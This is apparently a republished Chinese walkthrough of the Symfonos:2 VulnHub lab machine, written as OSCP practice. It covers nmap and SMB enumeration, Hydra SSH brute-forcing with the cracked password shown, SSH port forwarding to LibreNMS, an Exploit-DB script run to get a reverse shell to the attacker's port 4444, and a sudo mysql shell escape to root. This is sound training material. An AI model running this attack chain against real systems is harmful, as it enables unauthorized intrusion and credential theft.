OSCP难度靶机之Symfonos:2

admin 2025年2月25日13:28:38评论8 views字数 1838阅读6分7秒阅读模式

虚拟机信息:

虚拟机下载地址:https://www.vulnhub.com/entry/symfonos-2,331/

虚拟机简介:类似 OSCP 的基于现实生活的中级机器,旨在教授理解漏洞的重要性

目标:1个flag

级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之Symfonos:2

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.142

查看开放21、22、80、139、445端口

OSCP难度靶机之Symfonos:2

2、渗透测试

2.1 HTTP渗透测试

1.访问站点

OSCP难度靶机之Symfonos:2

2.使用dirb进行扫描

dirb http://192.168.207.142

OSCP难度靶机之Symfonos:2

3.使用gobuster爆破

gobuster dir -u http://192.168.207.142  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x html,php,txt -q -k -f

未发现有用信息

OSCP难度靶机之Symfonos:2

2.2 SMB渗透测试

1.使用enum4linux进行枚举

enum4linux  192.168.207.142

发现有anonymous分享

OSCP难度靶机之Symfonos:2

2.使用smbclient连接

smbclient -L 192.168.207.142

OSCP难度靶机之Symfonos:2

smbclient //192.168.207.142/anonymous

查看有log.txt文件信息

OSCP难度靶机之Symfonos:2

3.查看log日志文件存在用户

OSCP难度靶机之Symfonos:2

4.使用hydra进行爆破

hydra -l aeolus -P /usr/share/wordlists/rockyou.txt 192.168.207.142 ssh

爆破出密码为:sergioteamo

OSCP难度靶机之Symfonos:2

2.3 SSH测试

1.登录主机测试

ssh [email protected]

OSCP难度靶机之Symfonos:2

2.查看端口状态

nmap -p- 127.0.0.1

查看存在一个端口,查看端口连接

OSCP难度靶机之Symfonos:2

查看端口监听在127.0.0.1上

ss -lnp | grep 8080

OSCP难度靶机之Symfonos:2

3.使用SSH端口转发出去

ssh -N -f -L 8080:127.0.0.1:8080 [email protected]

OSCP难度靶机之Symfonos:2

4.使用kali进行访问

访问站点为LibreNMS

OSCP难度靶机之Symfonos:2

5.搜索相关漏洞

searchsploit librenms

OSCP难度靶机之Symfonos:2

cp /usr/share/exploitdb/exploits/php/webapps/47044.py ./

6.登录站点获取cookie

OSCP难度靶机之Symfonos:2

使用脚本进行连接,需要替换登录后获取的cookie值

python2 47044.py http://127.0.0.1:8080 "PHPSESSID=s7rvpuo0hf1p1qhrm6uggrjsq2;librenms_session=eyJpdiI6Im44amFxQWU2OFJxS0g2VVdKOFZ4XC9BPT0iLCJ2YWx1ZSI6ImZ6MzZSR0NPSDhQeEFNVE10T2RSTWpEbnYxOVFIZ1VrWTQ1TGxFM3MrMncrd0tLZmVMdU1ndW1FeFhjNmlLdVZUeEZDUTNzaTVzOFwvMUoyZG01VHBDQT09IiwibWFjIjoiN2M5YjhlYjcyZWIwOTMwZjE4MDdkODAwZjVjNjU2ZGIwNzU3ZTAzNzVhNzEyMjcyYjY5ZWE5YTNmOTA3YjA2MCJ9;XSRF-TOKEN=eyJpdiI6InJmbXVYbTQ5OStxbkl4MVNLTVhpenc9PSIsInZhbHVlIjoiQkwwYzBPK3R1UFl1cFlPXC9RVjVZbU5MVUJyVTc3UUJkNE1KUlV6elVpYlVEcm5HVERIUHUyUXVLN2JydzF1ZlJXVEJNQXBkdEsxV3BTU1lVNlVibTBnPT0iLCJtYWMiOiIzNzA2YWUyODAwZDlmYmM3NjRiODkyODVkZmI2NTc0MDEyMjI1OTdlMTFkNzY4NTA2ZDFhYTFmMmRkMGFlNTc2In0=" 192.168.207.129 4444

OSCP难度靶机之Symfonos:2

7.获取到反弹shell

OSCP难度靶机之Symfonos:2

2.4 系统提权

1.查看用户sudo权限

sudo -l

OSCP难度靶机之Symfonos:2

2.使用mysql命令进行提权

sudo mysql -e '! /bin/sh'

OSCP难度靶机之Symfonos:2

3.获取到flag值

cat /root/proof.txt

OSCP难度靶机之Symfonos:2

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Symfonos:2

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月25日13:28:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之Symfonos:2https://cn-sec.com/archives/848300.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息